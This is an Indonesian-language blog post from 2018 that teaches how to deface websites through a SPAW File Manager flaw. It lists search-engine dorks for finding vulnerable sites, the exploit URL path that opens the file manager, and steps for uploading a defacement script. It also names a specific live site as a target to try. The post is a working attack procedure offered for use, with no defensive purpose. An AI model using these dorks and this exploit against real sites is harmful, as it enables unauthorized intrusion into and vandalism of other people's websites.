Jumat, 06 April 2018

Deface SPAW File Manager

Author : Anonimokerl


Hae kamvank!1!1 Bertemu lagi dengan mimin yang tamvan :V Kali ini mimin akan share cara deface Poc SPAW File Manager. Langsung aja gan!1!1!1

1. Bahan-bahan :

  • Script Deface ext .html dan .txt
  • Internet
  • Hp/PC
2. Dork
  •  inurl:Spaw2/dialogs/
  •  Inurl:spaw2/uploads/files \
  •  Index of:/Spaw2/uploads/files

3. Exploit :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=

4. Langkah-langkah
  • Pertama, kita dorking dulu gan.
  • Kedua, kita pilih salah satu web dan tambahkan exploit dibelakang site/ 
Contoh :
Https://nimogans.tq/spaw2/upload/files
Lalu kita tambahkan exploitnya, menjadi
Https://nimogans.tq/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=


Kalo vuln muncul kek gambar diatas
  • Ketiga, kita setting dulu. Samakan kek yg diatas (yang ditandai)
  • Keempat kita upload scriptnya (kagak semua vuln upload html)
  • Kelima, Kita tambahkan exploit
/spaw2/upload/files/namascript
Contoh :
  • Selesai gan.
Live target
http://www.wholehealthamerica.com/spaw2/
tambahkan dulu exploitnya

Sekian dulu gan, kalo ada yang kurang ngerti comment aja :*


EmoticonEmoticon